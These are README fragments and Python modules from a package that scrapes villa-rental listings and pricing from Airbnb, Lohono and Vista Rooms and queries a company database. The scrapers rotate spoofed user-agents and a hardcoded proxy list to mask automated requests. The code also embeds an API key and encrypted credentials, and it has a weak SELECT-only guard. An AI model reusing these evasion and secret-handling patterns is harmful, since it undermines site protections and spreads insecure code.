file="stylesheets/main.css"
layer=".interfaces.IThemeSpecific"
/>
can be accessed from this relative URL:
"++resource++main.css"
Notes
-----
* Stylesheets registered as Zope 3 resources might be flagged as not found in
the 'portal_css' tool if the layer they are registered for doesn't match the
default skin set in 'portal_skins'.
This can be confusing but it must be considered as a minor bug in the CSS
registry instead of a lack in the way Zope 3 resources are handled in
Zope 2.
* There might be a way to interpret DTML from a Zope 3 resource view.
Although, if you need to use DTML for setting values in a stylesheet (the
same way as in default Plone stylesheets where values are read from
'base_properties'), it is much easier to store it in a directory that is
located in the 'skins/' folder of your package, registered as a File System
Directory View in the 'portal_skins' tool, and added to the layers of your
skin.
* Customizing/overriding stylesheets that are originally accessed from the
'portal_skins' tool (e.g. Plone default stylesheets) can be done inside that
tool only. There is no known way to do it with Zope 3 browser resources.
Vice versa, there is no known way to override a Zope 3 browser resource from
a skin layer in 'portal_skins'.
| 73.unlockItems | /73.unlockItems-0.3.tar.gz/73.unlockItems-0.3/73/unlockItems/browser/stylesheets/README.txt | README.txt |
This directory will be the home for internationalizations for your theme
package. For more information on internationalization please consult the
following sources:
http://plone.org/documentation/kb/product-skin-localization
http://plone.org/documentation/kb/i18n-for-developers
http://www.mattdorn.com/content/plone-i18n-a-brief-tutorial/
http://grok.zope.org/documentation/how-to/how-to-internationalize-your-application
http://maurits.vanrees.org/weblog/archive/2007/09/i18n-locales-and-plone-3.0
http://n2.nabble.com/Recipe-for-overriding-translations-td3045492ef221724.html
http://dev.plone.org/plone/wiki/TranslationGuidelines
| 73.unlockItems | /73.unlockItems-0.3.tar.gz/73.unlockItems-0.3/73/unlockItems/locales/README.txt | README.txt |
import pandas as pd
import datetime
from cryptography.fernet import Fernet
import pymysql
import random
import math
# Universal fn to establish a connection to the database (SQL)
def db_connection(cypher_key,database="main"):
key = bytes(cypher_key,'utf-8')
cipher_suite = Fernet(key)
if database=="main":
host_enc = b'gAAAAABgU5NFdPLwUewW-ljzzPKpURLo9mMKzOkClVvpWYotYRT6DsmgNlHYUKP8X3m_c12kAUqSrLw4KTlujTPly2F-R-CFrw=='
user_enc = b'gAAAAABf-DB2YcOMC7JvsL-GihLJcImh6DvJpt1hNZFetiCzxMacK4agYHkyl3W1mnRkHNmEnecp4mMPZRfqO6bsLP1qgrpWbA=='
pass_enc = b'gAAAAABf-DCFqT2kj-ExcdPn2IW0m0-M_3piK2-w1xNpUvH21XDsz3iqixvrT-NxKnpf1wirp0NcYoQEGt4TKpYHJzXcrXy6TA=='
database_enc = b'gAAAAABfQPr48Sej-V7GarivuF4bsfBgP9rldzD500gl174HK4LZy70VfEob-kbaOBFa8rhuio_PbCFj4Nt3nJzVjKqC83d1NA=='
elif database=="vista":
host_enc = b'gAAAAABfQPr4eF5i5aU4vfC4RieOdLr9GjwQPWWmvTWT728cK-qUoPesPZmLKwE4vTkhh3oxCmREfrHN1omRwmxJJuo_CS4cMmRKG8_mLFIBQG1mg2Kx102PixJAdf1l74dhO6VI8ZCR'
user_enc = b'gAAAAABfQPr4PssChqSwFRHAGwKGCrKRLvnjRqfBkrazUydFvX3RBNAr5zAvKxdGJtaemdjq3uRwk1kgY4tLpIO9CxXj_JdC0w=='
pass_enc = b'gAAAAABfQPr4iwH0c5pxjI4XfV-uT-pBt9tKfQgFJEfjTcTIjwipeN4tI_bG-TtHoamosKEuFOldevYPi-3usIj1ZDSrb-zsXg=='
database_enc = b'gAAAAABgU5oarKoMuMj5EYPHf59SSfalqJ1_vtsGjbk4Gepefkr5dhTnZg1KVSmt6Rln02B5SOJf-N9dzbA6Q47uJbZ-xNrJdQ=='
elif database=="dev":
host_enc = b'gAAAAABgU5RRIJqGSTQhaupb_rwblmtCTjl6Id6fa1JMsZQac6i9eaUtoBoglK92yuSCGiTaIadtjrwxmK5VMS2cM6Po-SWMpQ=='
user_enc = b'gAAAAABgU5QmKmvNsS7TC2tz66e3S40CSiNF8418N6ANGFn6D_RhP8fd4iQRML3uk9WnDlDAtYHpGjstwgpKH8YJ347xZHQawA=='
pass_enc = b'gAAAAABgU5Rf1piAvyT_p5LRd0YJheFT2Z9W75R4b2MUA1o1-O4Vn2Xw7R-1bWLx4EhYUrRZ6_ajI8DCgLVULZZdVSWxG6OvCw=='
database_enc = b'gAAAAABgU5SLKYwupyp_nrcSzGYcwDkkKKxGjmvEpULZV2MmKGDgXCefa2WvINUBrCCmBeyt9GcpzBQQSE9QN8azsDSItdTa5Q=='
else:
raise ValueError("Invalid Database, pick either of the 3 - ('main','dev','vista')")
myServer = cipher_suite.decrypt(host_enc).decode("utf-8")
myUser = cipher_suite.decrypt(user_enc).decode("utf-8")
myPwd = cipher_suite.decrypt(pass_enc).decode("utf-8")
db = cipher_suite.decrypt(database_enc).decode("utf-8")
myConnection = pymysql.connect(host=myServer,user=myUser,password=myPwd,db=db)
return myConnection
"""# Helper Functions
```
next_weekday()
mock_user_agent()
mock_proxy()
earth_distance(lat1,lon1,lat2,lon2)
```
"""
# Get the next weekday ( 0=monday , 1 = tuesday ... )
def next_weekday(weekday=0, d=None):
  # Resolve the default at call time; a datetime.date.today() default argument
  # would be evaluated only once, at import, and go stale.
  if d is None:
    d = datetime.date.today()
  days_ahead = weekday - d.weekday()
  if days_ahead <= 0: # Target day already happened this week
    days_ahead += 7
  return d + datetime.timedelta(days_ahead)
# default - next monday
# gives a random user-agent to use in the API call
def mock_user_agent():
users = ["Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41",
"Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00",
"Opera/9.60 (Windows NT 6.0; U; en) Presto/2.1.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)"]
  return random.choice(users)
# Gives a 'proxies' object for a 'requests' call
def mock_proxy():
proxies_list = ["45.72.30.159:80",
"45.130.255.156:80",
"193.8.127.117:80",
"45.130.255.147:80",
"193.8.215.243:80",
"45.130.125.157:80",
"45.130.255.140:80",
"45.130.255.198:80",
"185.164.56.221:80",
"45.136.231.226:80"]
  proxy = random.choice(proxies_list)
proxies = {
"http": proxy,
"https": proxy
}
return proxies
# Arial distance between 2 pairs of coordinates
def earth_distance(lat1,lon1,lat2,lon2):
  # Radius of the earth in kilometres
R = 6373.0
lat1 = math.radians(lat1)
lon1 = math.radians(lon1)
lat2 = math.radians(lat2)
lon2 = math.radians(lon2)
dlon = lon2 - lon1
dlat = lat2 - lat1
#Haversine formula
a = math.sin(dlat / 2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2)**2
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
distance = R * c
return distance
def to_fancy_date(date):
tmstmp = pd.to_datetime(date)
day = tmstmp.day
if 4 <= day <= 20 or 24 <= day <= 30:
suffix = "th"
else:
suffix = ["st", "nd", "rd"][day % 10 - 1]
return f"{tmstmp.day}{suffix} {tmstmp.month_name()} {tmstmp.year}" | 73e4d8e848405a88f444cff1c9dbc5b8 | /73e4d8e848405a88f444cff1c9dbc5b8-0.5-py3-none-any.whl/sstools/common.py | common.py |
import requests
import json
import pandas as pd
import datetime
from .common import *
"""# AirBnb"""
airbnb_home_types = ['Entire home apt','Hotel room','Private room', 'Shared room']
airbnb_imp_amenities = [5,4,16,7,9,12]
#AC, Wifi , Breakfast, Parking, Pool, Pets (Not in order)
# Airbnb Search API
def airbnb_search_api(place_id = "ChIJRYHfiwkB6DsRWIbipWBKa2k", city = "", state = "", min_price = 4000, max_price=50000, min_bedrooms=1, home_type=airbnb_home_types, items_per_grid = 50, amenities = [], items_offset = 0):
home_type = [item.replace(" ","%20") for item in home_type]
home_type = ["Entire%20home%2Fapt" if x=="Entire%20home%20apt" else x for x in home_type]
home_type_filter = "%22%2C%22".join(home_type)
amenities = [str(item) for item in amenities]
amenities_filter = "%2C".join(amenities)
url = f"https://www.airbnb.co.in/api/v3/ExploreSearch?locale=en-IN&operationName=ExploreSearch¤cy=INR&variables=%7B%22request%22%3A%7B%22metadataOnly%22%3Afalse%2C%22version%22%3A%221.7.8%22%2C%22itemsPerGrid%22%3A{items_per_grid}%2C%22tabId%22%3A%22home_tab%22%2C%22refinementPaths%22%3A%5B%22%2Fhomes%22%5D%2C%22source%22%3A%22structured_search_input_header%22%2C%22searchType%22%3A%22filter_change%22%2C%22mapToggle%22%3Afalse%2C%22roomTypes%22%3A%5B%22{home_type_filter}%22%5D%2C%22priceMin%22%3A{min_price}%2C%22priceMax%22%3A{max_price}%2C%22placeId%22%3A%22{place_id}%22%2C%22itemsOffset%22%3A{items_offset}%2C%22minBedrooms%22%3A{min_bedrooms}%2C%22amenities%22%3A%5B{amenities_filter}%5D%2C%22query%22%3A%22{city}%2C%20{state}%22%2C%22cdnCacheSafe%22%3Afalse%2C%22simpleSearchTreatment%22%3A%22simple_search_only%22%2C%22treatmentFlags%22%3A%5B%22simple_search_1_1%22%2C%22oe_big_search%22%5D%2C%22screenSize%22%3A%22large%22%7D%7D&extensions=%7B%22persistedQuery%22%3A%7B%22version%22%3A1%2C%22sha256Hash%22%3A%22274161d4ce0dbf360c201612651d5d8f080d23820ce74da388aed7f9e3b00c7f%22%7D%7D"
#url = f"https://www.airbnb.co.in/api/v3/ExploreSearch?locale=en-IN&operationName=ExploreSearch¤cy=INR&variables=%7B%22request%22%3A%7B%22metadataOnly%22%3Afalse%2C%22version%22%3A%221.7.8%22%2C%22itemsPerGrid%22%3A20%2C%22roomTypes%22%3A%5B%22Entire%20home%2Fapt%22%5D%2C%22minBedrooms%22%3A0%2C%22source%22%3A%22structured_search_input_header%22%2C%22searchType%22%3A%22pagination%22%2C%22tabId%22%3A%22home_tab%22%2C%22mapToggle%22%3Afalse%2C%22refinementPaths%22%3A%5B%22%2Fhomes%22%5D%2C%22ib%22%3Atrue%2C%22amenities%22%3A%5B4%2C5%2C7%2C9%2C12%2C16%5D%2C%22federatedSearchSessionId%22%3A%22e597713a-7e46-4d10-88e7-3a2a9f15dc8d%22%2C%22placeId%22%3A%22ChIJM6uk0Jz75zsRT1nlkg6PwiQ%22%2C%22itemsOffset%22%3A20%2C%22sectionOffset%22%3A2%2C%22query%22%3A%22Karjat%2C%20Maharashtra%22%2C%22cdnCacheSafe%22%3Afalse%2C%22simpleSearchTreatment%22%3A%22simple_search_only%22%2C%22treatmentFlags%22%3A%5B%22simple_search_1_1%22%2C%22oe_big_search%22%5D%2C%22screenSize%22%3A%22large%22%7D%7D&extensions=%7B%22persistedQuery%22%3A%7B%22version%22%3A1%2C%22sha256Hash%22%3A%22274161d4ce0dbf360c201612651d5d8f080d23820ce74da388aed7f9e3b00c7f%22%7D%7D"
payload = {}
headers = {
'authority': 'www.airbnb.co.in',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'device-memory': '4',
'x-airbnb-graphql-platform-client': 'apollo-niobe',
#'x-csrf-token': 'V4$.airbnb.co.in$lHdA3kStJv0$yEvcPM_C6eeUUHkQuYEdGFWrZreA5ui1e4A-pMzDFI=',
'x-airbnb-api-key': 'd306zoyjsyarp7ifhu67rjxn52tv0t20',
'x-csrf-without-token': '4',
'user-agent': mock_user_agent(),
'viewport-width': '1600',
'content-type': 'application/json',
'accept': '*/*',
'dpr': '1',
'ect': '4g',
'x-airbnb-graphql-platform': 'web',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
# 'referer': f'https://www.airbnb.co.in/s/{city}--{state}/homes?tab_id=home_tab&refinement_paths%5B%5D=%2Fhomes&adults=2&source=structured_search_input_header&search_type=filter_change&map_toggle=false&room_types%5B%5D=Entire%20home%2Fapt&price_min=4221&place_id={place_id}',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
}
  response = requests.get(url, headers=headers, data = payload)
  response = json.loads(response.text.encode('utf8'))
  return response
# Airbnb Calendar API
def airbnb_calendar_api(listing_id,start_month=9,start_year=2020,bev='1600684519_NDg5ZGY1ZDQ4YjNk',month_count=4):
url = f"https://www.airbnb.co.in/api/v3/PdpAvailabilityCalendar?operationName=PdpAvailabilityCalendar&locale=en-IN¤cy=INR&variables=%7B%22request%22%3A%7B%22count%22%3A{month_count}%2C%22listingId%22%3A%22{listing_id}%22%2C%22month%22%3A{start_month}%2C%22year%22%3A{start_year}%7D%7D&extensions=%7B%22persistedQuery%22%3A%7B%22version%22%3A1%2C%22sha256Hash%22%3A%22b94ab2c7e743e30b3d0bc92981a55fff22a05b20bcc9bcc25ca075cc95b42aac%22%7D%7D"
payload = {}
headers = {
'authority': 'www.airbnb.co.in',
#'pragma': 'no-cache',
#'cache-control': 'no-cache',
#'device-memory': '8',
'x-airbnb-graphql-platform-client': 'minimalist-niobe',
#'x-csrf-token': 'V4$.airbnb.co.in$lHdA3kStJv0$yEvcPMB_C6eeUUHkQuYEdGFWrZreA5ui1e4A-pMzDFI=',
'x-airbnb-api-key': 'd306zoyjsyarp7ifhu67rjxn52tv0t20',
#'x-csrf-without-token': '1',
'user-agent': mock_user_agent(),
'viewport-width': '1600',
'content-type': 'application/json',
'accept': '*/*',
'dpr': '1',
'ect': '4g',
'x-airbnb-graphql-platform': 'web',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://www.airbnb.co.in/rooms/{listing_id}?adults=2&source_impression_id=p3_1598719581_vge1qn5YJ%2FXWgUKg&check_in=2020-10-01&guests=1',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
'cookie': f'bev={bev};'
}
response = requests.request("GET", url, headers=headers, data = payload)
response = json.loads(response.text.encode('utf8'))
return response
#Airbnb search DataFrame
def airbnb_search(place_ids = ["ChIJRYHfiwkB6DsRWIbipWBKa2k"], max_iters = 5, min_price=4000,max_price=200000, home_type=[],amenities=[], min_bedrooms=1 ):
all_items = []
for place_id in place_ids:
counter = 1
offset = 0
while counter<=max_iters:
print(f"Round {counter} for {place_id}")
counter+=1
response = airbnb_search_api(place_id = place_id, min_price = min_price ,max_price=max_price, min_bedrooms=min_bedrooms,home_type=home_type,amenities=amenities, items_offset = offset)
offset += 50
if not response['data']['dora']['exploreV3']['sections']:
break
else:
for sections in response['data']['dora']['exploreV3']['sections']:
if 'listing' in sections['items'][0].keys():
all_items.extend(sections['items'])
items_df = pd.DataFrame([item['listing'] for item in all_items])
prices_df = pd.DataFrame([item['pricingQuote'] for item in all_items])
items_df[['canInstantBook','weeklyPriceFactor','monthlyPriceFactor','priceDropDisclaimer','priceString','rateType']] = prices_df[['canInstantBook','weeklyPriceFactor','monthlyPriceFactor','priceDropDisclaimer','priceString','rateType']]
return_obj = items_df[['id','name','roomAndPropertyType','reviews','avgRating','starRating','reviewsCount','amenityIds','previewAmenityNames','bathrooms','bedrooms','city','lat','lng','personCapacity','publicAddress','pictureUrl','pictureUrls','isHostHighlyRated','isNewListing','isSuperhost','canInstantBook','weeklyPriceFactor','monthlyPriceFactor','priceDropDisclaimer','priceString','rateType']]
return_obj = return_obj.drop_duplicates('id')
return return_obj
# Airbnb Calendar DataFrame
def airbnb_calendar(listing_id,start_month=None,start_year=None):
  # Defaults resolve at call time (a function-default date would be frozen at import).
  if start_month is None:
    start_month = datetime.datetime.today().month
  if start_year is None:
    start_year = datetime.datetime.today().year
api_response = airbnb_calendar_api(listing_id,start_month,start_year)
all_months = [month['days'] for month in api_response['data']['merlin']['pdpAvailabilityCalendar']['calendarMonths']]
all_days=[]
for month in all_months:
all_days.extend(month)
all_days = pd.DataFrame(all_days)
all_days['price'] = [item['localPriceFormatted'][1:].replace(",","") for item in all_days['price'].values]
all_days['calendarDate'] = pd.to_datetime(all_days['calendarDate'])
all_days['listing_id'] = listing_id
all_days = all_days.astype({'price':'int32'})
return all_days
# Get Occupancy data for a listing id
def airbnb_occupancy(listing_id):
clndr = airbnb_calendar(listing_id=listing_id,start_month=datetime.datetime.today().month,start_year=datetime.datetime.today().year)
clndr = clndr.set_index('calendarDate')
clndr_monthly = clndr.groupby(pd.Grouper(freq='M')).mean()
clndr_monthly['month-year'] = [str(item.month_name())+" "+str(item.year) for item in clndr_monthly.index]
clndr_monthly = clndr_monthly.set_index('month-year')
clndr_monthly['occupancy'] = 1-clndr_monthly['available']
occupancy = clndr_monthly['occupancy'].to_json()
available = clndr[clndr['available']==True].index
blocked = clndr[clndr['available']==False].index
available = [str(item.date()) for item in available]
blocked = [str(item.date()) for item in blocked]
return_obj = {
"listing_id": listing_id,
"monthly_occupancy" : occupancy,
"blocked_dates" : blocked,
"available_dates": available
}
return return_obj | 73e4d8e848405a88f444cff1c9dbc5b8 | /73e4d8e848405a88f444cff1c9dbc5b8-0.5-py3-none-any.whl/sstools/airbnb.py | airbnb.py |
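A sketch tying the search and occupancy helpers together. The place id is the module's default Google place id, and the listing id is taken from the search result:

```python
# Sketch only: uses the module's default place id; any real listing id works.
from sstools.airbnb import airbnb_search, airbnb_occupancy

villas = airbnb_search(place_ids=['ChIJRYHfiwkB6DsRWIbipWBKa2k'],
                       min_price=4000, max_price=50000)
print(villas[['id', 'name', 'avgRating', 'priceString']].head())

occ = airbnb_occupancy(villas['id'].iloc[0])
print(occ['monthly_occupancy'])
```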
import requests
import json
import pandas as pd
from .common import *
# List of all lohono locations
def lohono_locations():
locations = ['india-alibaug','india-goa','india-lonavala','india-karjat']
return locations
# lohono Search API wrapper
def lohono_search_api(location_slug="india-goa",page=1):
url = "https://www.lohono.com/api/property"
params = {
'location_slug': location_slug,
'page': page
}
payload = {}
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://www.lohono.com/villas/india/{ location_slug.split("-")[-1] }',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'
}
response = requests.get(url, headers=headers, data = payload, params=params)
search_data = json.loads(response.text.encode('utf8'))
return search_data
# lohono listing API wrapper
def lohono_listing_api(slug='prop-villa-magnolia-p5sp'):
url = f"https://www.lohono.com/api/property/{slug}"
payload = {}
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://www.lohono.com/villas/india/goa/prop-fonteira-vaddo-a-C6Cn',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'
}
response = requests.get(url, headers=headers, data = payload)
listing_data = json.loads(response.text.encode('utf8'))
return listing_data['response']
# lohono Pricing API wrapper
def lohono_pricing_api(slug,checkin,checkout,adult=2,child=0):
url = f"https://www.lohono.com/api/property/{slug}/price"
payload = "{\"property_slug\":\""+slug+"\",\"checkin_date\":\""+str(checkin)+"\",\"checkout_date\":\""+str(checkout)+"\",\"adult_count\":"+str(adult)+",\"child_count\":"+str(child)+",\"coupon_code\":\"\",\"price_package\":\"\",\"isEH\":false}"
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'content-type': 'application/json',
'origin': 'https://www.lohono.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://www.lohono.com/villas/india/goa/{slug}?checkout_date={checkout}&adult_count={adult}&checkin_date={checkin}',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
}
response = requests.post(url, headers=headers, data = payload)
pricing_data = json.loads(response.text.encode('utf8'))
return pricing_data
# Basic details from the search API
def lohono_search(location_slugs=lohono_locations()):
  all_properties = []
  for location_slug in location_slugs:
    page = 1
while True:
print(f"page{ page } for {location_slug}")
search_response = lohono_search_api(location_slug,page)
all_properties.extend(search_response['response']['properties'])
if search_response['paginate']['total_pages'] == page:
break
page += 1
return pd.DataFrame(all_properties)
# All details for all the listings
def lohono_master_dataframe():
search_data = lohono_search()
slugs = search_data['property_slug'].values
all_properties = []
for slug in slugs:
print(f"getting {slug}")
listing_raw = lohono_listing_api(slug)
all_properties.append(listing_raw)
all_properties = pd.DataFrame(all_properties)
all_properties['amenities'] = [[amenity['name'] for amenity in amenities] for amenities in all_properties['amenities']]
all_properties['price'] = search_data['rate']
all_properties['search_name'] = search_data['name']
return all_properties | 73e4d8e848405a88f444cff1c9dbc5b8 | /73e4d8e848405a88f444cff1c9dbc5b8-0.5-py3-none-any.whl/sstools/lohono.py | lohono.py |
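A sketch of the search helper above; 'india-goa' is one of the slugs returned by lohono_locations, and the column names come from the search response used elsewhere in this module:

```python
from sstools.lohono import lohono_search

goa = lohono_search(location_slugs=['india-goa'])
print(goa[['name', 'rate']].head())
```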
import requests
import json
import pandas as pd
from sendgrid.helpers.mail import Mail
from sendgrid import SendGridAPIClient
from .common import *
# SQL query on the SS database (ONLY SELECT) - returns a dataframe
def sql_query(query,cypher_key):
myConnection = db_connection(cypher_key,database="main")
  if query.strip().split()[0].upper() != 'SELECT':
print("Error. Please only use non destructive (SELECT) queries.")
return "Please only use non destructive (SELECT) queries."
response_df = pd.io.sql.read_sql(query, con=myConnection)
myConnection.close()
return response_df
# to execute destructive queries
def sql_query_destructive(query,cypher_key):
con = db_connection(cypher_key,database="main")
try:
with con.cursor() as cur:
cur.execute(query)
con.commit()
finally:
con.close()
class dev:
def sql_query(query,cypher_key):
myConnection = db_connection(cypher_key,database="dev")
response_df = pd.io.sql.read_sql(query, con=myConnection)
myConnection.close()
return response_df
def sql_query_destructive(query,cypher_key):
con = db_connection(cypher_key,database="dev")
try:
with con.cursor() as cur:
cur.execute(query)
con.commit()
finally:
con.close()
class aws:
def sql_query(query,cypher_key):
myConnection = db_connection(cypher_key,database="main")
    if query.strip().split()[0].upper() != 'SELECT':
print("Error. Please only use non destructive (SELECT) queries.")
return "Please only use non destructive (SELECT) queries."
response_df = pd.io.sql.read_sql(query, con=myConnection)
myConnection.close()
return response_df
# to execute destructive queries
def sql_query_destructive(query,cypher_key):
con = db_connection(cypher_key,database="main")
try:
with con.cursor() as cur:
cur.execute(query)
con.commit()
finally:
con.close()
# Get the status for all the dates for a list of homes
def get_calendar(listing_ids,check_in,check_out):
parsed_listing_ids = str(listing_ids)[1:-1]
parsed_listing_ids = parsed_listing_ids.replace("'","").replace(" ","")
url = "https://www.saffronstays.com/calender_node.php"
params={
"listingList": parsed_listing_ids,
"checkIn":check_in,
"checkOut":check_out
}
payload = {}
headers= {}
response = requests.get(url, headers=headers, data = payload,params=params)
response = json.loads(response.text.encode('utf8'))
return response
# SS Facebook catalogue (a list of currently live listings)
def ss_fb_catalogue():
url = "https://www.saffronstays.com/items_catalogue.php"
response = requests.get(url)
response_data = response.text.encode('utf8')
csv_endpoint = str(response_data).split('`')[1]
csv_download_url = "https://www.saffronstays.com/"+csv_endpoint
ss_data = pd.read_csv(csv_download_url)
return ss_data
# list of emails and preheader names, update with yours
def sendgrid_email(TEMPLATE_ID,EMAILS,api_key,PAYLOAD={},from_email='[email protected]',from_name='SaffronStays'):
""" Send a dynamic email to a list of email addresses
:returns API response code
:raises Exception e: raises an exception """
# create Mail object and populate
message = Mail(
from_email=(from_email,from_name),
to_emails=EMAILS
)
# pass custom values for our HTML placeholders
message.dynamic_template_data = PAYLOAD
message.template_id = TEMPLATE_ID
# create our sendgrid client object, pass it our key, then send and return our response objects
try:
sg = SendGridAPIClient(api_key)
response = sg.send(message)
code, body, headers = response.status_code, response.body, response.headers
print(f"Response code: {code}")
print(f"Response headers: {headers}")
print(f"Response body: {body}")
print("Dynamic Messages Sent!")
return str(response.status_code)
except Exception as e:
print("Error: {0}".format(e))
return "Error: {0}".format(e) | 73e4d8e848405a88f444cff1c9dbc5b8 | /73e4d8e848405a88f444cff1c9dbc5b8-0.5-py3-none-any.whl/sstools/saffronstays.py | saffronstays.py |
import requests
import json
import pandas as pd
import datetime
from IPython.display import clear_output
import time
from sqlalchemy.exc import IntegrityError
import math
from .common import *
# Return list of all locations
def vista_locations():
locations = ["lonavala, maharashtra",
"goa, goa",
"alibaug, maharashtra",
"nainital, uttarakhand",
"dehradun", "uttarakhand",
"chail, himanchal-pradesh",
"manali, himachal-pradesh",
"shimla, himanchal%20pradesh",
"ooty, tamil%20nadu",
"coorg, karnataka",
"dehradun, uttarakhand",
"jaipur, rajasthan",
"udaipur, rajasthan",
"mahabaleshwar, maharashtra",
"nashik, maharashtra",
"gangtok, sikkim",
"gurgaon, haryana",
"vadodara, gujarat",
"kashmir, jammu",
]
return locations
# Wrapper on the search API
def vista_search_api(search_type='city',location="lonavala,%20maharashtra",checkin="",checkout="",guests=2,adults=2,childs=0,page_no=1):
url = "https://searchapi.vistarooms.com/api/search/getresults"
param={
}
payload = {
"city": location,
"search_type": "city",
"checkin": checkin,
"checkout": checkout,
"total_guests": guests,
"adults": adults,
"childs": childs,
"page": page_no,
"min_bedrooms": 1,
"max_bedrooms": 30,
"amenity": [],
"facilities": [],
"price_start": 1000,
"price_end": 5000000,
"sort_by_price": ""
}
headers = {}
response = requests.post(url, params=param, headers=headers, data=payload)
search_data = json.loads(response.text.encode('utf8'))
return search_data
# Wrapper on the listing API
def vista_listing_api(slug='the-boulevard-villa',guests=2,checkin=datetime.date.today()+datetime.timedelta(1), checkout=datetime.date.today()+datetime.timedelta(2),
guest=3,adult=3,child=0):
url = "https://v3api.vistarooms.com/api/single-property"
param={
'slug': slug,
'checkin': checkin,
'checkout': checkout,
'guest': guest,
'adult': adult,
'child': child
}
payload = {}
headers = {
}
response = requests.get(url, params=param, headers=headers, data = payload)
property_deets = json.loads(response.text.encode('utf8'))
return property_deets
# Wrapper on the listing extra details API
def vista_listing_other_details_api(id=107):
url = "https://v3api.vistarooms.com/api/single-property-detail"
param={
'id': id,
}
payload = {}
headers = {
}
response = requests.get(url, params=param, headers=headers, data = payload)
property_other_deets = json.loads(response.text.encode('utf8'))
return property_other_deets
# Wrapper on the price calculator
def vista_price_calculator_api(property_id='710', checkin=datetime.date.today()+datetime.timedelta(1), checkout = datetime.date.today()+datetime.timedelta(2), guest = 2, adult = 2, child = 0):
if type(checkin)==str:
checkin = datetime.datetime.strptime(checkin,'%Y-%m-%d')
checkout = datetime.datetime.strptime(checkout,'%Y-%m-%d')
url = "https://v3api.vistarooms.com/api/price-breakup"
param={
'property_id': property_id,
'checkin': checkin,
'checkout': checkout,
'guest': guest,
'adult': adult,
'child': child,
}
payload = {}
headers = {
}
response = requests.get(url, params=param, headers=headers, data = payload)
pricing_deets = json.loads(response.text.encode('utf8'))
return pricing_deets
# Wrapper on the avalability (Blocked dates)
def vista_availability_api(property_id=119):
url = "https://v3api.vistarooms.com/api/calendar/property/availability"
params={
"property_id":property_id
}
payload = {}
headers = {
}
response = requests.get(url, headers=headers, data = payload, params=params)
calendar = json.loads(response.text.encode('utf8'))
return calendar
# Gives a json response for basic listing data for the list of locations
def vista_search_locations_json(locations=["lonavala,%20maharashtra"],guests=2,get_all=False,wait_time=10):
# Empty list to append (extend) all the data
properties = []
if get_all:
locations = vista_locations()
# Outer loop - for each location
for location in locations:
try:
page_no = 1
# Inner Loop - for each page in location ( acc to the Vista Search API )
while True:
clear_output(wait=True)
print(f"Page {page_no} for {location.split('%20')[0]} ")
# Vista API call (search)
search_data = vista_search_api(location=location,guests=guests,page_no=page_no)
# Break when you reach the last page for a location
        if 'data' not in search_data:
break
if not search_data['data']['properties']:
break
properties.extend(search_data['data']['properties'])
page_no += 1
time.sleep(wait_time)
except:
pass
return properties
# Returns a DATAFRAME for the above functions & **DROPS DUPLICATES (always use this for analysis)
def vista_search_locations(locations=["lonavala,%20maharashtra"],guests=2,get_all=False,wait_time=10):
villas = vista_search_locations_json(locations=locations, guests=guests,get_all=get_all,wait_time=wait_time)
villas = pd.DataFrame(villas)
villas = villas.drop_duplicates('id')
return villas
# Returns a JSON with the listing details
def vista_listing(slug='the-boulevard-villa',guests=2,checkin=datetime.date.today()+datetime.timedelta(1), checkout=datetime.date.today()+datetime.timedelta(2)):
print("Fetching ",slug)
# Vista API call (listing)
property_deets = vista_listing_api(slug=slug,guests=guests,checkin=checkin, checkout=checkout)
# Get lat and long (diff API call)
lat_long = vista_listing_other_details_api(property_deets['data']['property_detail']['id'])['data']['location']
# Get pricing for various durations
weekday_pricing = vista_price_calculator(property_deets['data']['property_detail']['id'],checkin=next_weekday(),checkout=next_weekday()+datetime.timedelta(1))
weekend_pricing = vista_price_calculator(property_deets['data']['property_detail']['id'],checkin=next_weekday(5),checkout=next_weekday(5)+datetime.timedelta(1))
entire_week_pricing = vista_price_calculator(property_deets['data']['property_detail']['id'],checkin=next_weekday(),checkout=next_weekday()+datetime.timedelta(7))
entire_month_pricing = vista_price_calculator(property_deets['data']['property_detail']['id'],checkin=next_weekday(),checkout=next_weekday()+datetime.timedelta(30))
# Add the extra fields in response (JSON)
property_deets['data']['slug'] = slug
property_deets['data']['lat'] = lat_long['latitude']
property_deets['data']['lon'] = lat_long['longitude']
